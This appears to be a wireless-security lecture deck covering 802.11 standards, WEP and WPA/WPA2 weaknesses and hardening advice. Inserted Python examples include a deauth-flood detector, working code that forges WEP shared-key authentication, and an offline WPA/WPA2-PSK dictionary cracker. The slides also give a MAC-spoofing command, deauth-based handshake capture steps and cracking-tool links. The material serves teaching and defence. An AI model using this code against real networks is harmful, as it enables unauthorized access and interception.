4 wifi security

Wireless Network Security

Upload: al-sari7

Post on 20-Aug-2015

Page 1

Wireless Network Security

Page 2

802.11 Standards

802.11a
• 54 Mbps @ 5 GHz
• Not interoperable with 802.11b
• Limited distance
• Dual-mode APs require 2 chipsets and look like two APs to clients
• Cisco products: Aironet 1200

802.11b
• 11 Mbps @ 2.4 GHz
• Full speed up to 300 feet; coverage up to 1750 feet
• Cisco products: Aironet 340, 350, 1100, 1200

802.11g
• 54 Mbps @ 2.4 GHz
• Same range as 802.11b
• Backward-compatible with 802.11b; speeds drop when the AP runs in dual (b/g) mode
• Cisco products: Aironet 1100, 1200

Page 3

802.11 Standards (Cont.)

802.11e – QoS; dubbed "Wireless MultiMedia (WMM)" by the Wi-Fi Alliance

802.11i – Security
• Adds AES encryption (CCMP)
• Requires more CPU, so new chips were required
• TKIP was the interim solution for existing WEP-era hardware

802.11n – (2009) up to 300 Mbps as commonly deployed (up to 600 Mbps with four spatial streams); 5 GHz and/or 2.4 GHz; ~230 ft range

802.11ac – under development when these slides were written (ratified in December 2013)
• High throughput in the 5 GHz band
• Wider RF channels
• Multi-station WLAN throughput of at least 1 Gbps and a maximum single-link throughput of at least 500 Mbps

Page 4

Wireless Network Modes

802.11 wireless networks operate in two basic modes:
1. Infrastructure mode
2. Ad-hoc mode

Infrastructure mode:
• Each wireless client connects directly to a central device called the Access Point (AP)
• No direct connection between wireless clients
• The AP acts as a wireless hub that sets up the connections and relays traffic between wireless clients

Page 5

Wireless Network Modes (cont'd)

The AP also handles:
• the clients' authentication and authorization
• link-level data security (access control and enabling data traffic encryption)

Ad-hoc mode:
• Each wireless client connects directly to the others
• No central device manages the connections
• Rapid deployment of a temporary network where no infrastructure exists (an advantage in case of disaster, etc.)
• Each node must maintain its own authentication list

Page 6

Security Threats

• Wireless technology doesn't remove any old security issues, but introduces new ones
– Viruses, Trojans and other malware are still there
– Eavesdropping
– Man-in-the-middle attacks
– Denial of Service

Page 7

Eavesdropping (Sniffing)

• Easy to perform, almost impossible to detect (a passive receiver transmits nothing)
• By default, on an open network with no link-layer encryption, everything is transmitted in clear text
– Usernames, passwords, content ...
– No security is offered by the transmission medium
• Different tools are available on the internet
– Network sniffers, protocol analysers ...
• With the right equipment (a directional antenna), it is possible to eavesdrop on traffic from a few kilometres away

Page 8

Wireless Man in the Middle (MITM) Attack

1. The attacker spoofs a disassociation message so that the victim's session with the real AP is torn down
2. The victim starts to look for a new access point, and the attacker advertises his own AP on a different channel, using the real AP's MAC address (BSSID) and SSID
3. The attacker connects to the real AP using the victim's MAC address

In a MITM attack, the attacker funnels the victim's traffic through a point controlled by the attacker. This allows data analysis and manipulation.

Page 9

Denial of Service

• Frequency jamming
– Not very technical, but works
• Spoofed deauthentication / disassociation messages
– Management frames are not authenticated (unless 802.11w Protected Management Frames is in use), so anyone who knows the AP's and client's MAC addresses can send them
– Can target one specific user
• Attacks on higher levels
– SYN flooding
– Ping of death
– ...
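The spoofed deauthentication/disassociation frames above are what a wireless IDS looks for. The following Python program is an added example, not part of the original slides: it parses the raw 802.11 management-frame header (frame control, addresses, sequence control, reason code) and flags a (transmitter, receiver) pair that sends an abnormal number of deauth/disassoc frames, also counting sequence-number jumps, since frames injected by an attacker's card carry the attacker's own sequence counter rather than the AP's. The capture, MAC addresses and threshold are constructed for the example and are assumptions.

```python
import struct
from collections import defaultdict

DEAUTH, DISASSOC, BEACON = 12, 10, 8          # management-frame subtypes (type 0)

def parse_mgmt(frame: bytes) -> dict:
    """Decode the 24-byte 802.11 header of a management frame.

    Frame Control byte 0: bits 0-1 protocol version, bits 2-3 type, bits 4-7 subtype.
    addr1 = receiver, addr2 = transmitter, addr3 = BSSID; the sequence number is
    the top 12 bits of the little-endian Sequence Control field. Deauth/disassoc
    bodies begin with a 2-byte little-endian reason code.
    """
    if len(frame) < 24:
        raise ValueError("truncated 802.11 header")
    fc0 = frame[0]
    ftype, subtype = (fc0 >> 2) & 0x3, fc0 >> 4
    mac = lambda off: ":".join(f"{b:02x}" for b in frame[off:off + 6])
    rec = {"type": ftype, "subtype": subtype, "dst": mac(4), "src": mac(10),
           "bssid": mac(16), "seq": struct.unpack_from("<H", frame, 22)[0] >> 4}
    if ftype == 0 and subtype in (DEAUTH, DISASSOC) and len(frame) >= 26:
        rec["reason"] = struct.unpack_from("<H", frame, 24)[0]
    return rec

def build_mgmt(subtype, dst, src, bssid, seq, body=b""):
    """Build a minimal management frame; used only to construct the sample capture."""
    addr = lambda s: bytes.fromhex(s.replace(":", ""))
    fc = bytes([subtype << 4, 0])                 # type 0 (management), no flags
    return (fc + b"\x00\x00" + addr(dst) + addr(src) + addr(bssid)
            + struct.pack("<H", seq << 4) + body)

def detect_deauth_flood(frames, threshold=5):
    """Flag (transmitter, receiver) pairs with more than `threshold` deauth or
    disassoc frames. Also counts sequence-number jumps on those frames: an
    attacker's card keeps its own sequence counter, so frames spoofed with the
    AP's address usually break the AP's otherwise monotonic numbering."""
    counts, reasons, jumps, last_seq = defaultdict(int), defaultdict(set), defaultdict(int), {}
    for f in frames:
        rec = parse_mgmt(f)
        prev = last_seq.get(rec["src"])
        jumped = prev is not None and (rec["seq"] - prev) % 4096 > 100
        last_seq[rec["src"]] = rec["seq"]
        if rec["type"] == 0 and rec["subtype"] in (DEAUTH, DISASSOC):
            key = (rec["src"], rec["dst"])
            counts[key] += 1
            reasons[key].add(rec.get("reason", -1))
            jumps[key] += jumped
    return {k: {"count": n, "reasons": sorted(reasons[k]), "seq_jumps": jumps[k]}
            for k, n in counts.items() if n > threshold}

# Constructed sample capture: the addresses are made up for the example.
AP, VICTIM, BROADCAST = "00:11:22:33:44:55", "66:77:88:99:aa:bb", "ff:ff:ff:ff:ff:ff"

def sample_capture():
    """Three beacons, one legitimate deauth (reason 3, STA leaving), then a burst
    of 20 deauths carrying the AP's address but an unrelated sequence counter."""
    frames = [build_mgmt(BEACON, BROADCAST, AP, AP, seq=i) for i in range(3)]
    frames.append(build_mgmt(DEAUTH, VICTIM, AP, AP, seq=3, body=struct.pack("<H", 3)))
    frames += [build_mgmt(DEAUTH, VICTIM, AP, AP, seq=1000 + i, body=struct.pack("<H", 7))
               for i in range(20)]
    return frames

if __name__ == "__main__":
    for (src, dst), info in detect_deauth_flood(sample_capture()).items():
        print(f"deauth flood {src} -> {dst}: {info['count']} frames, "
              f"reasons {info['reasons']}, sequence jumps {info['seq_jumps']}")
```

A detector like this can only raise an alert: without 802.11w the client will still honour the spoofed frames, so the mitigation is enabling Protected Management Frames on APs and clients that support it.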

Page 10

SSID – Service Set Identifier

• Identifies a particular wireless network
• A client must be configured with the same SSID as the AP to join the network
• Without the SSID, the client won't be able to select and join a wireless network
• Hiding the SSID is not a security measure, because the wireless network is not invisible
– Intruders can recover it by sniffing any probe request, probe response or association request that carries it in clear
– It is easy to find the ID of a "hidden" network because beacon broadcasting cannot be turned off; hiding only blanks the SSID field in the beacons
– Simply use a utility that shows all current networks: inSSIDer, NetStumbler, Kismet

Page 11

IEEE 802.11 Security – Access control list

• Simplest security measure: filtering out unknown users
• Requires a list of authorized clients' MAC addresses to be loaded in the AP
• Won't protect each wireless client, nor the confidentiality and integrity of the traffic ===> vulnerable
• MAC addresses are sent in clear in every frame, so the list is defeated by MAC spoofing:
– ifconfig eth0 hw ether 00:01:02:03:04:05 (Linux, legacy net-tools command)
– SMAC – KLC Consulting (Windows)
– MAC Makeup – H&C Works (Windows)

Page 12

WEP - Wired Equivalent Privacy

• The original native security mechanism for WLAN
• Used to protect wireless communication from eavesdropping (confidentiality)
• Prevents unauthorized access to a wireless network (access control)
• Prevents tampering with transmitted messages (integrity)
• Intended to provide users with a level of privacy equivalent to that inherent in wired networks

Page 13

WEP

1. Appends a 32-bit CRC checksum (the ICV) to each outgoing frame (INTEGRITY)
2. Encrypts the frame and ICV using the RC4 stream cipher, keyed with a 40-bit (standard) or 104-bit (enhanced) secret key prefixed by a 24-bit initialization vector (IV) (CONFIDENTIALITY)
3. The IV and the default key shared by the station and the access point are used to create a key stream. The key stream is XORed with the plain text message to produce the WEP-encrypted frame; the IV is sent in clear in the frame header so that the receiver can regenerate the same key stream.

Initialization Vector (IV)
• Dynamic 24-bit value
• Chosen by the transmitting wireless network interface (randomly or by counting up, depending on the driver)
• Only 16.7 million (2^24) possible values

Page 14

How WEP works

Page 15

RC4 keystream XORed with plaintext

XOR operation denoted as ⊕:
• plain-text ⊕ keystream = cipher-text
• cipher-text ⊕ keystream = plain-text
• plain-text ⊕ cipher-text = keystream (so any known plaintext reveals the keystream for that IV)

Page 16

WEP (Shared Key) Authentication

1. The station sends an authentication request to the AP.
2. The AP sends a challenge text (nonce) to the station.
3. The station encrypts the nonce with its configured 64-bit or 128-bit default key and sends the result to the AP.
4. The AP decrypts the encrypted nonce using its configured WEP key that corresponds to the station's default key.
5. The AP compares the decrypted nonce with the original nonce.
6. If they match, the access point and the station share the same WEP key, and the access point authenticates the station.
7. The station associates and connects to the network.

Page 17

WEP authentication problems

Known-plaintext attack
• Attacker sniffs the nonce (challenge) m sent by the AP
• Attacker sniffs the response sent by the station:
– IV in clear
– Encrypted nonce c
• Attacker calculates the keystream ks = m ⊕ c, which is the keystream for that IV
• Attacker then requests authentication and receives a nonce m'
• Attacker forms the response c' = ks ⊕ m' and reuses the same IV
• The AP decrypts, matches m' and declares the attacker authenticated!

Page 18

WEP flaws and vulnerabilities

IV reuse and small size:
• There are only 2^24 different IVs
• On a busy network the IV will surely be reused; if the default key has not been changed, the keystream repeats and the original message can be retrieved relatively easily (two frames with the same IV XOR to the XOR of their plaintexts)
• With IV reuse, it is possible to determine keystreams and hence enable an attacker to forge packets, obtaining access to the WLAN
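The following Python program is an added example and is not part of the original slides. It implements the WEP construction from the earlier slides (RC4 keyed with IV || key, CRC-32 ICV, IV sent in clear) and then carries out the two consequences of keystream reuse described on the WEP authentication problems and IV reuse slides: forging a shared-key authentication response from one sniffed challenge/response pair without ever learning the key, and recovering the XOR of two plaintexts from two frames encrypted under the same IV. The key, IVs, challenges and frame contents are constructed here and are assumptions.

```python
import os
import zlib

def rc4(key: bytes, length: int) -> bytes:
    """RC4 keystream of `length` bytes (key-scheduling then the PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return zlib.crc32(data).to_bytes(4, "little")

def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body = IV || (plaintext || ICV) XOR RC4(IV || key). Key is 40 or 104 bits."""
    assert len(iv) == 3 and len(key) in (5, 13)
    ks = rc4(iv + key, len(plaintext) + 4)
    return iv + xor(plaintext + icv(plaintext), ks)

def wep_decrypt(key: bytes, frame: bytes) -> bytes:
    """Regenerate the keystream from the clear IV, strip and verify the ICV."""
    iv, body = frame[:3], frame[3:]
    data = xor(body, rc4(iv + key, len(body)))
    plaintext, tag = data[:-4], data[-4:]
    if icv(plaintext) != tag:
        raise ValueError("ICV mismatch")
    return plaintext

# --- attack 1: forge a shared-key authentication response --------------------
def recover_keystream(challenge: bytes, response_frame: bytes):
    """Attacker side: the sniffed challenge m is the plaintext of the station's
    response, so ks = (m || CRC(m)) XOR body. Returns (iv, keystream)."""
    iv, body = response_frame[:3], response_frame[3:]
    return iv, xor(challenge + icv(challenge), body)

def forge_response(iv: bytes, keystream: bytes, new_challenge: bytes) -> bytes:
    """Encrypt the AP's new challenge m' with the recovered keystream and the same IV."""
    return iv + xor(new_challenge + icv(new_challenge), keystream)

def demo_auth_forgery(key: bytes = None) -> bool:
    """Full exchange: sniff one legitimate authentication, then authenticate
    without the key. Returns True when the AP would accept the forged response."""
    key = key or os.urandom(13)                      # secret the attacker never learns
    m = os.urandom(128)                              # challenge 1, sent by the AP
    legit = wep_encrypt(key, b"\x01\x02\x03", m)     # station's response, sniffed
    iv, ks = recover_keystream(m, legit)
    m2 = os.urandom(128)                             # challenge 2, issued to the attacker
    forged = forge_response(iv, ks, m2)
    return wep_decrypt(key, forged) == m2            # AP decrypts, matches m', accepts

# --- attack 2: IV reuse leaks plaintext XOR ----------------------------------
def iv_reuse_leak(key: bytes, iv: bytes, p1: bytes, p2: bytes) -> bytes:
    """Two frames under the same IV share a keystream: c1 XOR c2 == p1 XOR p2."""
    c1, c2 = wep_encrypt(key, iv, p1)[3:], wep_encrypt(key, iv, p2)[3:]
    return xor(c1, c2)[:min(len(p1), len(p2))]

if __name__ == "__main__":
    print("forged authentication accepted:", demo_auth_forgery())
    k, p1, p2 = b"\x0b" * 13, b"GET /login HTTP/1.1", b"GET /admin HTTP/1.1"
    leak = iv_reuse_leak(k, b"\x00\x00\x01", p1, p2)
    print("other frame recovered from one known plaintext:", xor(leak, p1) == p2)
```

The forgery works because the challenge is 128 bytes and every authentication response is encrypted under a keystream of the same length; the attacker does not need the key at all, only one IV's keystream. The same keystream recovery applies to data frames, which is what makes IV reuse fatal.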

Page 19

Attacks on WEP

• WEP encrypted networks can be cracked in about 10 minutes
• The goal is to collect enough IVs (encrypted frames with distinct IVs) to be able to recover the key statistically
• IV = Initialization Vector, a plaintext value prefixed to the key to avoid repetition of the keystream
• Injecting (replaying) captured packets makes the AP generate new encrypted frames, and hence new IVs, far faster than waiting for normal traffic

Page 20

Attacks on WEP

• BackTrack 5 R2 (released 1 March 2012); BackTrack was superseded by Kali Linux in 2013
• Tutorials are available
• All required tools on a Linux bootable CD + laptop + wireless card whose driver supports monitor mode and packet injection

Page 21

WEP cracking example

Page 22

WPA – (Wi-Fi Protected Access)

• Introduced by the Wi-Fi Alliance in 2003 (announced late 2002) to overcome the security flaws of WEP while still running on existing WEP hardware
• Improved data encryption – data is still encrypted with the RC4 stream cipher, but with a 128-bit per-packet key and a 48-bit initialization vector (IV). 2^48 is a large number: about 281 trillion
• Because of the many attacks related to the static key in WEP, WPA uses the Temporal Key Integrity Protocol (TKIP), which derives a fresh key for every packet and rekeys as the system is used. Combined with the much larger IV (which also serves as a replay counter), this defeats the well-known key recovery attacks on WEP
• A more secure message authentication code (usually known as a MAC, but here termed MIC for "Message Integrity Code") is used in WPA: an algorithm named "Michael"

Page 23

WPA2 - Wi-Fi Protected Access 2

• Based on the IEEE 802.11i standard
• 2 versions: Personal & Enterprise
• The primary enhancement over WPA is the use of the AES (Advanced Encryption Standard) algorithm in CCMP mode
• WPA2 requires AES-CCMP; TKIP may additionally be enabled only for backward compatibility with WPA-only clients
• The Personal mode uses a PSK (pre-shared key) and does not require separate authentication of users
• The Enterprise mode requires users to be separately authenticated using the EAP protocol over 802.1X

Page 24

Am I secure if I use WPA-PSK?

• WPA-PSK protected networks are vulnerable to dictionary attacks
– Works against WPA & WPA2 (802.11i): the key is derived from the passphrase and the SSID, and one captured 4-way handshake is enough to test candidate passphrases offline
• New attack techniques have increased the speed of this attack
– coWPAtty (http://wirelessdefence.org/Contents/coWPAttyMain.htm)
– Run coWPAtty against the captured packets to crack the key
– Needs the SSID to crack the WPA-PSK (it is the salt of the key derivation), and the SSID is easily obtainable!
– Also supports WPA2-PSK cracking with the same pre-computed tables, since the tables are built per SSID and the PMK derivation is identical in WPA and WPA2
• Capturing the handshake: spoof the MAC address of the AP and tell the client to disassociate, then sniff the wireless network for the WPA-PSK handshake (EAPOL) as the client reconnects
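The following Python program is an added example, not part of the original slides or of coWPAtty, showing why the SSID plus one captured handshake is all the attack above needs. It implements the standard derivations (PMK = PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt, PTK = PRF-512 of the PMK with both MAC addresses and both nonces, MIC = HMAC over EAPOL-Key message 2 with the MIC field zeroed) and then tests a small wordlist against a handshake constructed here. The SSID, addresses, nonces, the EAPOL frame skeleton, the wordlist and the "real" passphrase are all assumed values, not a real capture.

```python
import hashlib
import hmac

def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2(HMAC-SHA1, passphrase, SSID, 4096 iterations, 32 bytes).
    The SSID is the salt, which is why pre-computed tables are per-SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def prf512(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce)).
    The first 16 bytes of the PTK are the KCK that keys the handshake MIC."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):                                   # 4 x 20 bytes, truncated to 64
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]

def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes, version: int) -> bytes:
    """Key descriptor version 1 (WPA/TKIP): HMAC-MD5; version 2 (WPA2/CCMP): HMAC-SHA1,
    both truncated to 16 bytes, computed over the frame with its MIC field zeroed."""
    algo = hashlib.md5 if version == 1 else hashlib.sha1
    return hmac.new(kck, eapol_frame_mic_zeroed, algo).digest()[:16]

def crack_psk(ssid, aa, spa, anonce, snonce, eapol_mic_zeroed, captured_mic, version, wordlist):
    """Offline dictionary attack: PMK -> PTK -> KCK for each candidate, compare MICs.
    Everything needed is visible in the capture except the passphrase itself."""
    for word in wordlist:
        kck = prf512(pmk_from_passphrase(word, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_mic_zeroed, version), captured_mic):
            return word
    return None

# --- constructed handshake (assumed values, not a real capture) --------------
SSID = "CorpGuest"
AA = bytes.fromhex("001122334455")                       # AP (authenticator) address
SPA = bytes.fromhex("66778899aabb")                      # client (supplicant) address
ANONCE = bytes(range(32))                                # from message 1 (AP -> client)
SNONCE = bytes(range(32, 64))                            # from message 2 (client -> AP)
REAL_PASSPHRASE = "sunshine2012"                         # what the attacker does not know
# EAPOL-Key message 2 with the MIC field zeroed: 802.1X header (version 1, type Key,
# length 0x5f), descriptor type 2 (RSN), key info 0x010a (MIC set, pairwise, version 2),
# key length 0, replay counter, SNonce, IV, RSC, ID, MIC (zeroed), key data length.
EAPOL_M2 = (bytes.fromhex("0103005f02010a0000") + b"\x00" * 8 + SNONCE
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16 + b"\x00\x00")

def captured_mic() -> bytes:
    """What the client transmits in message 2 (the value the attacker sniffs)."""
    kck = prf512(pmk_from_passphrase(REAL_PASSPHRASE, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    return eapol_mic(kck, EAPOL_M2, version=2)

WORDLIST = ["password", "letmein", "CorpGuest", "sunshine", "sunshine2012", "qwerty"]

def run_attack():
    return crack_psk(SSID, AA, SPA, ANONCE, SNONCE, EAPOL_M2, captured_mic(), 2, WORDLIST)

if __name__ == "__main__":
    print("recovered passphrase:", run_attack())
```

The 4096-iteration PBKDF2 is the only thing slowing the attacker down, and it is per candidate, not per network; against a passphrase that is in a wordlist it is merely a delay. Changing the SSID to a non-default value only invalidates tables precomputed for common SSIDs; a long random passphrase is what actually defeats the attack.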

Page 25

WPA Cracking Example

Page 26

Wireless Network tools

MAC Spoofing
• http://aspoof.sourceforge.net/
• http://www.gorlani.com/publicprj/macmakeup/macmakeup.asp
• http://www.klcconsulting.net/smac/

WEP Cracking tools
• http://www.backtrack-linux.org/
• http://www.remote-exploit.org/articles/backtrack/index.html
• http://wepattack.sourceforge.net/
• http://wepcrack.sourceforge.net/

Wireless Analysers
• http://www.kismetwireless.net/
• http://www.netstumbler.com/

Page 27

Techniques to improve wireless security

• Use a wireless intrusion prevention system (WIPS)
• Enable WPA2-PSK at minimum; WEP and WPA/TKIP are broken
• Use a good, long passphrase (https://grc.com/password): the dictionary attack above only succeeds against guessable passphrases
• Use WPA2 where possible, and WPA2-Enterprise (802.1X/EAP) where per-user credentials are available
• AES-CCMP is more secure; TKIP exists only for legacy hardware and should not be chosen for performance, since it is slower and has known attacks
• Change your SSID every so often; on its own this adds little, but a non-default SSID does defeat pre-computed PSK tables
• Wireless network users should use or upgrade their network to the latest released security standard